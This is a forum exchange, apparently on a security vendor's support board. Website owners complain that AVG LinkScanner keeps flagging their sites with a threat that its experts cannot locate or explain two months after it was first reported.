it is odd that it is explained as being a one time one IP and yet even those on static IPs are getting it multiple times, it is odd that every time I see the 'threat' it seems to point to a different place, or no place, but never a specific place, it is odd that your LinkScanner 'experts' claim to know this threat exists but can't provide any evidence of its existence,

they claim to know, yet can't identify it, can't tell you where it is, can't tell you how to eradicate it,

all they seem to be able to do is tell everyone to get professional assistance for a problem they've been aware of for two months.

YES! You're right ondraploteny, it is very strange indeed.

And we should all be very worried about this very bizarre situation. Of being informed of a threat, having our visitors warned of a threat, that has been known for 2 months, but nothing seems to be known about it, and nothing has been done about it...

except, that is, to be advised to seek professional assistance to find something that AVG is detecting but can't find themselves.

What is the most strange about this entire fiasco is...

that your LinkScanner 'experts' are detecting this but can't point to any file or folder of where the detection is...

we're just supposed to take their word for it. That it's there, even though they have no clue where.